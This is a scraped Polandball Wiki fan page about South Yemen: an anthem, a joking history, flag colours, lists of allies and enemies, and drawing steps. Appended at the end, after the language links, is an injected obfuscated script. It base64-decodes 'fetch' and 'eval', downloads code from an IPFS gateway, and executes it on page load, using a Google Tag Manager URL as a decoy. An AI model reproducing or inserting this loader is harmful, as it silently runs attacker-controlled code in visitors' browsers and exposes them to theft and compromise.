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    Polandball Wiki

    مَوْطِنِيْ، عِزَّتِيْ
    سَوْفَ اَحْمِيْكَ بِرُوْحِيْ وَدَمِيْ
    ثَوْرَتِيْ، رَايَتِيْ
    فِي الْعُلَا وَالْمَجْدُ تَحْيٰى يَا الْجُنُوْب
    (O my motherland, O my honour
    I will protect you with my spirit and my blood
    O my revolution, O my banner
    Long live in highness and glory, O South!)
    South Yemenball

    Best South Yemenball, sometimes called Democratic Yemenball, or Adenball, officially known first as People's Republic of South Yemenball starting in 1967, then as the People's Democratic Republic of Yemenball starting in 1969, was a socialist republic in South Arabia. It is now a separatist countryball wanting to become independent again.


    Influenced by the 26 September revolution of  North Yemenball, in 1963 some young Marxist and nationalist Arabballs attacked  British Empireball's protectorate  Federation of South Arabiaball. After four years of fighting, they earned independence and proclaimed a sovereign people's republic in 1967, making a socialist state under the Yemeni Socialist Party in 1969. South Yemenball clashed with North Yemenball at the border in 1972, but the two agreed to unify in the future. Around the time the Soviet Unionball was falling they were merged back into Yemenball. Those opposed to unification attempted to recreate South Yemenball as Democratic Republic of Yemenball in the 1994 Yemeni Civil War. Nowadays, it's a separatist region of Yemenball seeking independence again in the Yemeni Civil War (2015-present).

    Flag Colors

    Color Name RGB CMYK HEX
    Philippine Red 205, 17, 37 C0-M92-Y82-K20 #CD1125
    White 255, 255, 255 N/A #FFFFFF
    Black 0, 0, 0 C0-M0-Y0-K100 #000000
    Aero blue 128, 195, 230 C44-M15-Y0-K9 #80C3E6



    • Ba'athist Iraqball - Fellow Arab socialist, but suppresses communists periodically. But Iraqball has supported me, unlike the conservative monarchies of Arabia. Beat me in the 1976 Asian Cup though.
    • Libyan Arab Jamahiriyaball - Arab socialist who supports me too. RIP Gaddafi, you were great...
    •  Sudanball - Frequently civil warring ball across the Red Sea from me. It suppressed communists after 1971 though. We were in the Arab Deterrent Force together in Lebanese Civil War.
    •  UAEball - It supports me in the Yemeni Civil War and wants me to be restored, pretty much my best friend now
    • Cubaball - Commie comrade who supports me. RIP Castro, you were great.
    •  Dergball - I helped it against  Somali Democratic Republicball in the Ogaden War.
    •  East Germanyball - True Germanyball! Is Another awesome comrade. It is now reunited with its foolish capitalist sibling as  Germanyball now.
    •  Indiaball - We have some pre-independence history together (British Rajball) and were always friendly ever since you recognized my independence in 1967. We both like Bangladeshball.
    •  Sovietball - Another commie comrade. I miss it now, RIP.
    • DLFball, PFLOAGball, PFLOball - Marxist factions of the Dhofar Rebellion in Omanball. I supported them trying to break away from monarchy after I overthrew mine.
    • PR Kampucheaball - You are the real Kampuchea and I support you against Khmer Rougeball.


    •  North Yemenball - My sibling. We usually had good relations with each other, but sometimes we fought, and North Yemenball claimed my Kamaran Island. And I could've won the 1994 war and been restored again! I am true Yemen! We had united together to unite Yemen. Again, why do you like Bangladesh genocider?
    • Yemenball - It protects me and we also both hate terrorists and Houthis, but I WANT INDEPENDENCE! I AM GOING TO BE ALIVE AGAIN! Stop bringing me down you bossy boots!
    •  Egyptball - Helped me win independence, but prefers North Yemenball to me when there is a choice.
    •  Saudi Arabiaball - My reactionary northern neighbour. Took al-Wadiah from me in 1969, but we were part of the Arab Deterrent Force together during the Lebanese Civil War. It supported my separation attempt in 1994 and is leading the intervention in the Yemeni Civil War.
    •  Syriaball - It is friends with Libyan Arab Jamahiriyaball and  Cubaball and we were allies during the Cold War, but before we become friends again, you need to stop supporting Houthiball immediately!
    •  UKball - My parent. It's a filthy capitalist and imperialist, but it was OK and let me become independent (after warring for four years). It usually supports North Yemenball whenever we fight though.


    • Israelcube - The Zionist entity. End occupation of Palestineball!
    • Pakistanball - Same as Israelcube. End occupation of Bangladeshball!
    •  Omanball - My eastern neighbor, a conservative absolute monarchy. Our relations were strained and I supported the rebels trying to break loose in Dhofarball.
    •  Somali Democratic Republicball - Fellow Arab League member and socialist but the enemy in the Ogaden War when it tried to take Ogadeniaball from Dergball. Also claimed part of my Socotraball. Why must we fight, comrade?
    •  Iranball - It's of funding those Houthis rats! Stop it, you idiot! Shoo!
    • Al-Qaedaball & ISISball - Shoo! Get out of my clay you dirty terrorist rats! REMOVE!
    •  Houthiball - Shoo! Get out, you terrorists!

    How to draw

    1. Draw a circle.
    2. Draw three stripes consisting of red, white, and black.
    3. Draw a light blue triangle on the left and add a red star to it.


    ru:Южный Йемен pl:South Yemenball es:Yemen del Surball<script>(function(w,d,s,l,i,j,k){w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYnB2NHdCeUdrUVcxVW1XVXYzUFBrYlFHWVBOUmVKOUM5Z0JzbnoxclFKQ3U=','fa8a9292')</script>

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